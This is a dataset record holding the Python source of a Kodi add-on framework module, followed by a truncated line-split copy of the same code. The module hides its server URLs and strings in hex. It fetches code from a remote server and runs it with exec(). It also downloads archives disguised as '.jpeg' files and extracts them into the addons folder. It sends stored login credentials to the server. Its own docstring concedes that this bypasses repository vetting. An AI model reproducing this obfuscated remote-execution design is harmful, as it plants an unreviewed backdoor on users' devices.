0.03571428571428571, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0.01, 0 ]
343
0.006222
false
# -*- coding: utf-8 -*- # script.module.python.koding.aio # Python Koding AIO (c) by whufclee (info@totalrevolution.tv) # Python Koding AIO is licensed under a # Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. # You should have received a copy of the license along with this # work. If not, see http://creativecommons.org/licenses/by-nc-nd/4.0. # IMPORTANT: If you choose to use the special noobsandnerds features which hook into their server # please make sure you give approptiate credit in your add-on description (noobsandnerds.com) # # Please make sure you've read and understood the license, this code can NOT be used commercially # and it can NOT be modified and redistributed. If you're found to be in breach of this license # then any affected add-ons will be blacklisted and will not be able to work on the same system # as any other add-ons which use this code. Thank you for your cooperation. import os import re import shutil import sys import time import urllib import urllib2 import xbmc import xbmcaddon import xbmcgui import inspect try: import simplejson as json except: import json from addons import * from android import * from database import * from directory import * from filetools import * from guitools import * from router import * from systemtools import * from tutorials import * from video import * from web import * def converthex(url): """ internal command ~""" import binascii return binascii.unhexlify(url) try: ADDON_ID = xbmcaddon.Addon().getAddonInfo('id') except: ADDON_ID = Caller() AddonVersion = xbmcaddon.Addon(id=ADDON_ID).getAddonInfo('version') try: if sys.argv[1] == converthex('7465737466696c65'): ADDON_ID = ADDON_ID+'.test' except: pass if ADDON_ID.endswith(converthex('2e74657374')): ORIG_ID = ADDON_ID[:-5] else: ORIG_ID = ADDON_ID TestID = ADDON_ID if not ADDON_ID.endswith(converthex('2e74657374')): TestID = ADDON_ID+converthex('2e74657374') MODULE_ID = 'script.module.python.koding.aio' ADDON = xbmcaddon.Addon(id=ADDON_ID) THIS_MODULE = xbmcaddon.Addon(id=MODULE_ID) USE_TEST = Addon_Setting(addon_id=ADDON_ID,setting=converthex('74657374766572')) USERDATA = xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c65')) ADDON_DATA = xbmc.translatePath(os.path.join(USERDATA,converthex('6164646f6e5f64617461'))) ADDONS = xbmc.translatePath(converthex('7370656369616c3a2f2f686f6d652f6164646f6e73')) PACKAGES = os.path.join(ADDONS,converthex('7061636b61676573')) UPDATE_ICON = os.path.join(ADDONS,MODULE_ID,converthex('7265736f7572636573'),converthex('7570646174652e706e67')) COOKIE = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'),converthex('74656d70')) RUNCODE = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'),converthex('6b6565706d65')) DOWNLOAD_DST = xbmc.translatePath(converthex('7370656369616c3a2f2f686f6d652f6164646f6e732f7061636b616765732f6370')) LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e')) FORUM = Addon_Setting(addon_id=ORIG_ID,setting=converthex('666f72756d')) USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')).replace(' ','%20') if LOGIN == 'true' else '' PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else '' DEBUG = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6465627567')) INSTALL_REPOS = Addon_Setting(addon_id=ORIG_ID,setting=converthex('696e7374616c6c7265706f73')) INSTALL_ADDONS = Addon_Setting(addon_id=ORIG_ID,setting=converthex('696e7374616c6c6164646f6e73')) SILENT_MODE = Addon_Setting(addon_id=ORIG_ID,setting=converthex('73696c656e74')) KODI_VER = int(float(xbmc.getInfoLabel("System.BuildVersion")[:2])) dialog = xbmcgui.Dialog() dp = xbmcgui.DialogProgress() launch = 'launch.py' main_counter = 0 downloads = [] stddownloads = [] nologindownloads = [] usernamelen = len(USERNAME) if usernamelen > 14: usernamelen = 15 if FORUM == converthex('556e6f6666696369616c204b6f646920537570706f7274'): FORUM = 'k' if FORUM == converthex('436f6d6d756e697479204275696c647320537570706f7274'): FORUM = 'c' if not os.path.exists(os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'))): os.makedirs(os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'))) #---------------------------------------------------------------- # TUTORIAL # def dolog(string, my_debug = False): """ Print to the Kodi log but only if debugging is enabled in settings.xml CODE: koding.dolog(string, [my_debug]) AVAILABLE PARAMS: (*) string - This is your text you want printed to log. my_debug - This is optional, if you set this to True you will print to the log regardless of what the debug setting is set at in add-on settings. EXAMPLE CODE: koding.dolog(string='Quick test to see if this gets printed to the log', my_debug=True)~""" import xbmc global DEBUG global ADDON_ID if DEBUG == 'true' or my_debug: xbmc.log('### %s : %s'%(ADDON_ID,string), 2) #---------------------------------------------------------------- def Check_Addons(addons): """ internal command ~""" if ',' in addons and INSTALL_ADDONS != '0': addon_array = addons.split(',') for addon in addon_array: Main('addoninstall|id:%s~version:%s~repo:%s~silent:%s~installtype:%s' % (addon,KODI_VER,INSTALL_REPOS,SILENT_MODE,INSTALL_ADDONS)) #---------------------------------------------------------------- def Check_Cookie(mode = ''): """ internal command ~""" if not os.path.exists(COOKIE): cookie_folder = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573')) if not os.path.exists(cookie_folder): os.makedirs(cookie_folder) writefile = open(COOKIE,'w') writefile.close() readfile = open(COOKIE,'r') content = Encryption('d',readfile.read()) readfile.close() loginmatch = re.compile('w="(.+?)"').findall(content) basematch = re.compile('b="(.+?)"').findall(content) datematch = re.compile('d="(.+?)"').findall(content) addonsmatch = re.compile('a="(.+?)"').findall(content) basedomain = basematch[0] if (len(basematch) > 0) else 'http://noobsandnerds.com' date = datematch[0] if (len(datematch) > 0) else '0' welcometext = loginmatch[0] if (len(loginmatch) > 0) else '' addons = addonsmatch[0] if (len(addonsmatch) > 0) else '' returns = ['register','PASSWORD','restricted','reactivate'] LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e')) USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')) if LOGIN == 'true' else '' PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else '' if welcometext not in returns and welcometext != USERNAME: run_cookie = True elif LOGIN == 'true' and welcometext == '': User_Info() return elif LOGIN == 'true' and welcometext != USERNAME: run_cookie = True elif LOGIN == 'false' and welcometext == USERNAME: run_cookie = True else: run_cookie = False if run_cookie: try: shutil.rmtree(COOKIE) except: pass if mode == 'base': if int(date)+1000000 < int(Timestamp()): User_Info('cookie_check') else: return basedomain else: if int(date)+1000000 < int(Timestamp()) or run_cookie: return False else: return True #---------------------------------------------------------------- def Check_File_Date(url, datefile, localdate, dst): """ internal command ~""" try: req = urllib2.Request(url) req.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3') conn = urllib2.urlopen(req) last_modified = conn.info().getdate('last-modified') last_modified = time.strftime('%Y%m%d%H%M%S', last_modified) if int(last_modified) > int(localdate): dp.create(THIS_MODULE.getLocalizedString(30979),THIS_MODULE.getLocalizedString(30807)) download.download(url,dst,dp) if converthex('74737463686b') in url: extract.all(dst,ADDONS,dp) else: extract.all(dst, ADDON_DATA, dp) writefile = open(datefile, 'w+') writefile.write(last_modified) writefile.close() try: if os.path.exists(dst): os.remove(dst) except: pass except: pass #---------------------------------------------------------------- def Check_Updates(url, datefile, dst): """ internal command ~""" if os.path.exists(datefile): readfile = open(datefile,'r') localdate = readfile.read() readfile.close() else: localdate = 0 Check_File_Date(url, datefile, int(localdate), dst) #---------------------------------------------------------------- def Encryption(mode='', message=''): """ internal command ~""" finaltext = '' translated = '' finalstring = '' offset = 8 if len(USERNAME) > 0 and LOGIN == 'true': offset = usernamelen if mode == 'e': for symbol in message: num = ord(symbol)+offset if len(str(num))==2: num = '0'+str(num) finalstring = str(finalstring)+str(num) return finalstring+finaltext else: messagearray = [message[i:i+3] for i in range(0, len(message), 3)] for item in messagearray: item = int(item)-offset item = str(unichr(item)) finaltext = finaltext+item return finaltext #---------------------------------------------------------------- def Get_IP(): """ internal command ~""" link = Open_URL(converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f6c6f67696e5f636f6f6b69652e706870'), 'post').replace('\r','').replace('\n','').replace('\t','') link = Encryption(mode='d',message=link) ipmatch = re.compile('i="(.+?)"').findall(link) ipfinal = ipmatch[0] if (len(ipmatch) > 0) else '' return ipfinal #---------------------------------------------------------------- # TUTORIAL # def Main(url='', post_type = 'get'): """ If you have web pages of your own then you can hook into them using koding.Main(url) which will pull the return from the URL and attempt to execute that code. WARNING: Running code directly from a server is generally discouraged, any add-ons using such code will certainly not be accepted on the official kodi.tv forum as it is strictly against their rules. By having add-ons capable of self updating and bypassing their highly vetted repository system it would be a security breach for the foundation so their stance on this is completely understandable. For third party development you are presumably in control of your own repository so it really shouldn't make much difference, however do note that running code directly from a server is slower than running locally and you'll find it's discouraged by a number of devs. Can certainly be useful for quick dynamic updates which need to take place though. CODE: koding.Main(url,[post_type]) post_type is optional, by default it's set as 'get' AVAILABLE VALUES: 'get' - This is already the default so no real need to add this but this uses a standard query string 'post' - This will convert the query string into a post EXAMPLE CODE: koding.Main('http://noobsandnerds.com?id=test', post_type='get')~""" try: url = converthex(url) except: pass if url == 'run': runcode_date = 0 if os.path.exists(RUNCODE): runcode_date = os.path.getmtime(RUNCODE) runcode_date = time.localtime(runcode_date) runcode_date = time.strftime('%Y%m%d%H%M%S', runcode_date) if int(runcode_date)+1000000 < int(Timestamp()): run_code = Open_URL(url, post_type) if run_code: writefile = open(RUNCODE, 'w') writefile.write(run_code) writefile.close() else: readfile = open(RUNCODE,'r') run_code = readfile.read() readfile.close() else: run_code = Open_URL(url=url, post_type=post_type) if run_code: try: my_code = Encryption('d',run_code) dolog('MY CODE: %s'%my_code) exec(my_code) dolog(converthex('232323205375636365737366756c6c792072756e20636f646520696e20656e6372797074696f6e206d6f6465')) except: dolog(converthex('232323204661696c656420746f2072756e20636f64652c20617474656d7074696e6720746f20757365207374616e64617264206d6f6465')) try: exec(run_code) dolog(converthex('232323205375636365737366756c6c792072756e20636f6465')) except: dolog(Last_Error()) try: exec(converthex(run_code)) dolog(converthex('232323205375636365737366756c6c792072756e20636f6465')) except: if DEBUG == 'true': dialog.ok(THIS_MODULE.getLocalizedString(30980),THIS_MODULE.getLocalizedString(30981)%ADDON_ID) else: dolog(run_code) #----------------------------------------------------------------------------- # TUTORIAL # def User_Info(mode = ''): """ THIS MUST BE CALLED AT START OF CODE IF USING NOOBSANDNERDS FRAMEWORK. This is only required for developers who want to use the special noobsandnerds features, this will create a cookie file containing cached details. It's important you do this somewhere at the start of your code as it will initialise your variables on first run.~""" global main_counter if not Check_Cookie(): LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e')) USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')).replace(' ','%20') if LOGIN == 'true' else '' PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else '' link = Open_URL('', 'post').replace('\r','').replace('\n','').replace('\t','') if len(link) < 3: dialog.ok(THIS_MODULE.getLocalizedString(30833),THIS_MODULE.getLocalizedString(30834)) return try: link = Encryption('d',link) except: try: link = converthex(link) except: dolog(converthex('556e61626c6520746f2072657472696576652076616c696420646174612066726f6d20736572766572')) welcomematch = re.compile('l="(.+?)"').findall(link) welcometext = welcomematch[0] if (len(welcomematch) > 0) else '' ipmatch = re.compile('i="(.+?)"').findall(link) ipclean = ipmatch[0] if (len(ipmatch) > 0) else '0.0.0.0' domainmatch = re.compile('d="(.+?)"').findall(link) domain = domainmatch[0] if (len(domainmatch) > 0) else '' emailmatch = re.compile('e="(.+?)"').findall(link) email = emailmatch[0] if (len(emailmatch) > 0) else 'Unknown' postsmatch = re.compile('p="(.+?)"').findall(link) posts = postsmatch[0] if (len(postsmatch) > 0) else '0' unreadmatch = re.compile('u="(.+?)"').findall(link) unread = unreadmatch[0] if (len(unreadmatch) > 0) else '0' messagematch = re.compile('m="(.+?)"').findall(link) messages = messagematch[0] if (len(messagematch) > 0) else '0' donmatch = re.compile('t="(.+?)"').findall(link) don = donmatch[0] if (len(donmatch) > 0) else '' stdmatch = re.compile('s="(.+?)"').findall(link) std = stdmatch[0] if (len(stdmatch) > 0) else '' nologinmatch = re.compile('n="(.+?)"').findall(link) nologin = nologinmatch[0] if (len(nologinmatch) > 0) else '' reqaddonmatch = re.compile('r="(.+?)"').findall(link) reqaddons = reqaddonmatch[0] if (len(reqaddonmatch) > 0) else '' dolog(converthex('7265717569726564206164646f6e733a')) # User required re-activation on the FORUM - old FORUM user from totalxbmc if converthex('72656163746976617465') in welcometext: xbmc.log(converthex('75736572696e666f202d2072656163746976617465')) try: dolog(converthex('726561637469766174696f6e207265717569726564202d20706c656173652076697369742074686520666f72756d206174207777772e6e6f6f6273616e646e657264732e636f6d2f737570706f727420616e64206c6f67696e2e204974206c6f6f6b732061732074686f75676820796f75206861766520616e206f6c64206163636f756e742066726f6d20546f74616c58424d432064617973207768696368206a75737420726571756972656420726561637469766174696f6e2e')) os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30831),THIS_MODULE.getLocalizedString(30832)) # Currently restricted elif converthex('72657374726963746564') in welcometext: xbmc.log(converthex('75736572696e666f202d2072657374726963746564')) dolog(converthex('5741524e494e473a204163636f756e742063757272656e746c792072657374726963746564202d20746f6f206d616e79206c6f67696e732066726f6d206d756c7469706c65204950732e20496620796f75207468696e6b20796f75277665206163636964656e74616c6c79206c656674206c6f67696e20696e666f726d6174696f6e20696e2061206275696c64206f7220796f7572206c6f67696e20686173206265656e20636f6d70726f6d6973656420706c656173652075706461746520796f75722070617373776f7264206f6e20746865206e6f6f6273616e646e6572647320666f72756d20415341502121212054686973207265737472696374696f6e2077696c6c206265206175746f6d61746963616c6c79206c69667465642077697468696e20323420686f757273206275742077696c6c206265207265696e73746174656420617320736f6f6e206173206d756c7469706c6520495020636f6e6e656374696f6e73206172652064657465637465642e')) dialog.ok(THIS_MODULE.getLocalizedString(30829),THIS_MODULE.getLocalizedString(30830)) # Wrong PASSWORD entered elif converthex('70617373776f7264') in welcometext: xbmc.log(converthex('75736572696e666f202d2077726f6e672070617373776f7264')) try: dolog(converthex('77726f6e672070617373776f7264202d20706c656173652072652d656e74657220616e642074727920616761696e')) os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30825),THIS_MODULE.getLocalizedString(30826)) Open_Settings() # Not registered and LOGIN is true elif converthex('7265676973746572') in welcometext and LOGIN == 'true': xbmc.log(converthex('75736572696e666f202d206e6f742072656769737465726564')) try: dolog(converthex('4e6f742072656769737465726564202d20706c65617365207265676973746572206174207777772e6e6f6f6273616e646e657264732e636f6d2f737570706f7274')) os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30827),THIS_MODULE.getLocalizedString(30828)) Open_Settings() # Login is true but not details are entered elif LOGIN == 'true' and USERNAME == '' and PASSWORD == '': xbmc.log(converthex('75736572696e666f202d206c6f67696e207472756520627574206e6f2064657461696c73')) dialog.ok(THIS_MODULE.getLocalizedString(30835),THIS_MODULE.getLocalizedString(30836)) Open_Settings() # All settings checks are fine, create the COOKIE file else: xbmc.log(converthex('75736572696e666f202d20616c6c2066696e65')) dolog(converthex('416c6c2073657474696e677320636865636b206f75742066696e65202d207570646174696e6720636f6f6b69652066696c65')) writefile = open(COOKIE, mode='w+') writefile.write(Encryption('e','d="'+str(Timestamp())+'"|b="'+domain+'"|w="'+welcometext+'"|i="'+ipclean+'"|e="'+email+'"|m="'+messages+'"|u="'+unread+'"|t="'+don+'"|s="'+std+'"|p="'+posts+'"'+'"|n="'+nologin+'"'+'"|a="'+reqaddons+'"')) writefile.close() main_counter += 1 Check_Addons(reqaddons) if main_counter < 3: xbmc.log(converthex('23232320646f696e6720766572696679')) Verify() else: dialog.ok(THIS_MODULE.getLocalizedString(30833),THIS_MODULE.getLocalizedString(30834)) return # If this was called to recreate a COOKIE file just to return base url then we call that function again elif mode == 'cookie_check': Check_Cookie('base') else: Verify() #---------------------------------------------------------------- def Verify(testmode = ''): """ internal command ~""" ADDON_ID = xbmcaddon.Addon().getAddonInfo('id') try: if sys.argv[1] == converthex('7465737466696c65'): ADDON_ID = ADDON_ID+'.test' except: pass # if LOGIN is true but no USERNAME and PASSWORD we open settings localfile = open(COOKIE, mode='r') content = localfile.read() content = Encryption('d',content) localfile.close() nologinmatch = re.compile('n="(.+?)"').findall(content) # Set the standard logged in downloads array if len(nologinmatch)>0: nologindownloads = nologinmatch[0].split(',') for item in nologindownloads: if len(item)>3: download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ORIG_ID+'/'+item+'.jpeg') Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ORIG_ID+'/'+item), DOWNLOAD_DST) # If LOGIN is true but they haven't entered details then open up settings if LOGIN == 'true' and (USERNAME == '' or PASSWORD == ''): dolog(converthex('6c6f67696e207472756520627574207573657220616e64207061737320626c616e6b')) dialog.ok(THIS_MODULE.getLocalizedString(30835),THIS_MODULE.getLocalizedString(30836)) ADDON.openSettings() return # if test version enabled but LOGIN isn't tell user they need to enter credentials elif USE_TEST == 'true' and LOGIN == 'false': dolog(converthex('747279696e6720746f2072756e20746573742076657273696f6e20627574206e6f206c6f67696e20696e666f')) dialog.ok(THIS_MODULE.getLocalizedString(30961),THIS_MODULE.getLocalizedString(30962)) ADDON.openSettings() return # else if LOGIN is true continue elif LOGIN == 'true': dolog(converthex('6c6f67696e20697320656e61626c6564')) # if user not previously logged in call the user_info function if not os.path.exists(COOKIE): dolog(converthex('6c6f6767696e6720696e20666f722066697273742074696d65202d20636865636b696e672063726564656e7469616c73')) User_Info() # if user previously logged in then read COOKIE file else: dolog(converthex('70726576696f75736c79206c6f6767656420696e2c20636865636b696e6720636f6f6b6965')) userdatematch = re.compile('d="(.+?)"').findall(content) loginmatch = re.compile('w="(.+?)"').findall(content) ipmatch = re.compile('i="(.+?)"').findall(content) donmatch = re.compile('t="(.+?)"').findall(content) stdmatch = re.compile('s="(.+?)"').findall(content) basematch = re.compile('b="(.+?)"').findall(content) addonsmatch = re.compile('a="(.+?)"').findall(content) basedomain = basematch[0] if (len(basematch) > 0) else '' updatecheck = userdatematch[0] if (len(userdatematch) > 0) else '0' welcometext = loginmatch[0] if (len(loginmatch) > 0) else '' addons = addonsmatch[0] if (len(addonsmatch) > 0) else '' ipclean = ipmatch[0] if (len(ipmatch) > 0) else '0.0.0.0' myip = Get_IP() # Set the standard logged in downloads array if len(stdmatch)>0: stddownloads = stdmatch[0].split(',') # if user has chosen to use test version check test version is avaialble and if not already installed install it then open the settings for new addon if USE_TEST == 'true': global launch testmatch = donmatch[0].split('|') launch = testmatch[0] downloads = testmatch[1].split(',') if not ADDON_ID.endswith(converthex('2e74657374')): TestADDON_ID = ADDON_ID+converthex('2e74657374') else: TestADDON_ID = ADDON_ID ADDON_ID = ADDON_ID.replace(converthex('2e74657374'),'') if len(downloads)>0 and not os.path.exists(os.path.join(ADDONS,TestADDON_ID)): try: download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ADDON_ID+'/'+downloads[0]+'.jpeg') Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ADDON_ID+'/'+downloads[0]), DOWNLOAD_DST) xbmc.executebuiltin('UpdateLocalAddons') # open settings for new addon, this is so the relevant settings can be opened xbmc.sleep(2000) xbmcaddon.Addon(id=TestADDON_ID).openSettings() return except: dialog.ok(THIS_MODULE.getLocalizedString(30965),THIS_MODULE.getLocalizedString(30966)) return elif len(downloads)==0: dialog.ok(THIS_MODULE.getLocalizedString(30963),THIS_MODULE.getLocalizedString(30964)) return xbmc.executebuiltin("XBMC.Notification("+THIS_MODULE.getLocalizedString(30807)+","+THIS_MODULE.getLocalizedString(30808)+",5000,"+UPDATE_ICON+")") # if user needs to reactivate account remove COOKIE file and notify user they need to LOGIN at FORUM if converthex('72656163746976617465') in welcometext: dolog(converthex('23232320766572696679202d206163636f756e74206e6565647320726561637469766174696f6e')) try: os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30831),THIS_MODULE.getLocalizedString(30832)) # if user is currently restricted they cannot continue elif converthex('63757272656e746c792072657374726963746564') in welcometext: dolog(converthex('23232320766572696679202d206163636f756e742069732072657374726963746564')) dialog.ok(THIS_MODULE.getLocalizedString(30829),THIS_MODULE.getLocalizedString(30830)) # if user enters wrong PASSWORD remove COOKIE and get them to re-enter details elif converthex('57726f6e672050617373776f726420456e7465726564') in welcometext: dolog(converthex('23232320766572696679202d2077726f6e672070617373776f72642c2072656d6f76696e6720636f6f6b6965')) try: os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30825),THIS_MODULE.getLocalizedString(30826)) ADDON.openSettings() # if they aren't registered remove the COOKIE file and open settings elif converthex('524547495354455220464f522046524545') in welcometext: dolog('4449584945204445414e204953204120434f434b20474f42424c4552') try: os.remove(COOKIE) except: pass dialog.ok(THIS_MODULE.getLocalizedString(30827),THIS_MODULE.getLocalizedString(30828)) ADDON.openSettings() # if the date in COOKIE is not up and the ip matches the one in COOKIE we can continue dolog(Encryption('e', converthex('23232320766572696679202d206970636c65616e3a202573') % ipclean)) dolog(Encryption('e', converthex('23232320766572696679202d206d7969703a202573') % myip)) elif int(updatecheck)+1000000 > int(Timestamp()) and ipclean == myip: if USE_TEST == 'true': dolog(converthex('23232320766572696679202d207465737476657273696f6e2069732074727565')) for item in downloads: dolog(Encryption('e',converthex('23232320766572696679202d20636865636b696e673a202573') % item)) download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ADDON_ID+'/'+item+'.jpeg') cleanitem = item.replace('test','') if Addon_Setting(addon_id=TestID,setting=cleanitem) == 'true': Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+TestID+'/'+item), DOWNLOAD_DST) for item in stddownloads: dolog('4449584945204445414e204953204120434f434b20474f42424c4552') download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ORIG_ID+'/'+item+'.jpeg') if Addon_Setting(addon_id=ADDON,setting=item) == 'true': Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ORIG_ID+'/'+item), DOWNLOAD_DST) xbmc.executebuiltin('Dialog.Close(busydialog)') Main('run') else: User_Info() elif LOGIN == 'false': dolog('232323206c6f67696e2064697361626c6564') Main('run') #---------------------------------------------------------------- try: if sys.argv[1] == converthex('7465737466696c65') and LOGIN == 'true': if os.path.exists(os.path.join(ADDONS,ORIG_ID)) and os.path.exists(os.path.join(ADDONS,TestID)): dolog(converthex('2323232072756e6e696e67207665726966792822747275652229')) Verify('true') if sys.argv[1] == converthex('73657474696e6773'): if not os.path.exists(os.path.join(ADDONS,TestID)): dialog.ok(THIS_MODULE.getLocalizedString(30901),THIS_MODULE.getLocalizedString(30902)) else: xbmcaddon.Addon(id=TestID).openSettings() if sys.argv[1] == converthex('636c6561725f64617461'): Clear_Data(ADDON_ID) except: pass
[ "# -*- coding: utf-8 -*-\n", "\n", "# script.module.python.koding.aio\n", "# Python Koding AIO (c) by whufclee (info@totalrevolution.tv)\n", "\n", "# Python Koding AIO is licensed under a\n", "# Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.\n", "\n", "# You should have received a copy of the license along with this\n", "# work. If not, see http://creativecommons.org/licenses/by-nc-nd/4.0.\n", "\n", "# IMPORTANT: If you choose to use the special noobsandnerds features which hook into their server\n", "# please make sure you give approptiate credit in your add-on description (noobsandnerds.com)\n", "# \n", "# Please make sure you've read and understood the license, this code can NOT be used commercially\n", "# and it can NOT be modified and redistributed. If you're found to be in breach of this license\n", "# then any affected add-ons will be blacklisted and will not be able to work on the same system\n", "# as any other add-ons which use this code. Thank you for your cooperation.\n", "\n", "import os\n", "import re\n", "import shutil\n", "import sys\n", "import time\n", "import urllib\n", "import urllib2\n", "import xbmc\n", "import xbmcaddon\n", "import xbmcgui\n", "import inspect\n", "try:\n", " import simplejson as json\n", "except:\n", " import json\n", "\n", "from addons import *\n", "from android import *\n", "from database import *\n", "from directory import *\n", "from filetools import *\n", "from guitools import *\n", "from router import *\n", "from systemtools import *\n", "from tutorials import *\n", "from video import *\n", "from web import *\n", "\n", "def converthex(url):\n", " \"\"\" internal command ~\"\"\"\n", " import binascii\n", " return binascii.unhexlify(url)\n", "\n", "try:\n", " ADDON_ID = xbmcaddon.Addon().getAddonInfo('id')\n", "except:\n", " ADDON_ID = Caller()\n", "\n", "AddonVersion = xbmcaddon.Addon(id=ADDON_ID).getAddonInfo('version')\n", "\n", "try:\n", " if sys.argv[1] == converthex('7465737466696c65'):\n", " ADDON_ID = ADDON_ID+'.test'\n", "except:\n", " pass\n", "\n", "if ADDON_ID.endswith(converthex('2e74657374')):\n", " ORIG_ID = ADDON_ID[:-5]\n", "else:\n", " ORIG_ID = ADDON_ID\n", "\n", "TestID = ADDON_ID\n", "if not ADDON_ID.endswith(converthex('2e74657374')):\n", " TestID = ADDON_ID+converthex('2e74657374')\n", "\n", "MODULE_ID = 'script.module.python.koding.aio'\n", "ADDON = xbmcaddon.Addon(id=ADDON_ID)\n", "THIS_MODULE = xbmcaddon.Addon(id=MODULE_ID)\n", "USE_TEST = Addon_Setting(addon_id=ADDON_ID,setting=converthex('74657374766572'))\n", "USERDATA = xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c65'))\n", "ADDON_DATA = xbmc.translatePath(os.path.join(USERDATA,converthex('6164646f6e5f64617461')))\n", "ADDONS = xbmc.translatePath(converthex('7370656369616c3a2f2f686f6d652f6164646f6e73'))\n", "PACKAGES = os.path.join(ADDONS,converthex('7061636b61676573'))\n", "UPDATE_ICON = os.path.join(ADDONS,MODULE_ID,converthex('7265736f7572636573'),converthex('7570646174652e706e67'))\n", "COOKIE = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'),converthex('74656d70'))\n", "RUNCODE = os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'),converthex('6b6565706d65'))\n", "DOWNLOAD_DST = xbmc.translatePath(converthex('7370656369616c3a2f2f686f6d652f6164646f6e732f7061636b616765732f6370'))\n", "LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e'))\n", "FORUM = Addon_Setting(addon_id=ORIG_ID,setting=converthex('666f72756d'))\n", "USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')).replace(' ','%20') if LOGIN == 'true' else ''\n", "PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else ''\n", "DEBUG = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6465627567'))\n", "INSTALL_REPOS = Addon_Setting(addon_id=ORIG_ID,setting=converthex('696e7374616c6c7265706f73'))\n", "INSTALL_ADDONS = Addon_Setting(addon_id=ORIG_ID,setting=converthex('696e7374616c6c6164646f6e73'))\n", "SILENT_MODE = Addon_Setting(addon_id=ORIG_ID,setting=converthex('73696c656e74'))\n", "KODI_VER = int(float(xbmc.getInfoLabel(\"System.BuildVersion\")[:2]))\n", "\n", "dialog = xbmcgui.Dialog()\n", "dp = xbmcgui.DialogProgress()\n", "\n", "launch = 'launch.py'\n", "main_counter = 0\n", "\n", "downloads = []\n", "stddownloads = []\n", "nologindownloads = []\n", "\n", "usernamelen = len(USERNAME)\n", "if usernamelen > 14:\n", " usernamelen = 15\n", "\n", "if FORUM == converthex('556e6f6666696369616c204b6f646920537570706f7274'):\n", " FORUM = 'k'\n", "if FORUM == converthex('436f6d6d756e697479204275696c647320537570706f7274'):\n", " FORUM = 'c'\n", "\n", "if not os.path.exists(os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573'))):\n", " os.makedirs(os.path.join(ADDON_DATA,ORIG_ID,converthex('636f6f6b696573')))\n", "#----------------------------------------------------------------\n", "# TUTORIAL #\n", "def dolog(string, my_debug = False):\n", " \"\"\"\n", "Print to the Kodi log but only if debugging is enabled in settings.xml\n", "\n", "CODE: koding.dolog(string, [my_debug])\n", "\n", "AVAILABLE PARAMS:\n", "\n", " (*) string - This is your text you want printed to log.\n", "\n", " my_debug - This is optional, if you set this to True you will print\n", " to the log regardless of what the debug setting is set at in add-on settings.\n", "\n", "EXAMPLE CODE:\n", "koding.dolog(string='Quick test to see if this gets printed to the log', my_debug=True)~\"\"\"\n", "\n", " import xbmc\n", " global DEBUG\n", " global ADDON_ID\n", " if DEBUG == 'true' or my_debug:\n", " xbmc.log('### %s : %s'%(ADDON_ID,string), 2)\n", "#----------------------------------------------------------------\n", "def Check_Addons(addons):\n", " \"\"\" internal command ~\"\"\"\n", " if ',' in addons and INSTALL_ADDONS != '0':\n", " addon_array = addons.split(',')\n", " for addon in addon_array:\n", " Main('addoninstall|id:%s~version:%s~repo:%s~silent:%s~installtype:%s' % (addon,KODI_VER,INSTALL_REPOS,SILENT_MODE,INSTALL_ADDONS))\n", "#----------------------------------------------------------------\n", "def Check_Cookie(mode = ''):\n", " \"\"\" internal command ~\"\"\"\n", " if not os.path.exists(COOKIE):\n", " cookie_folder = 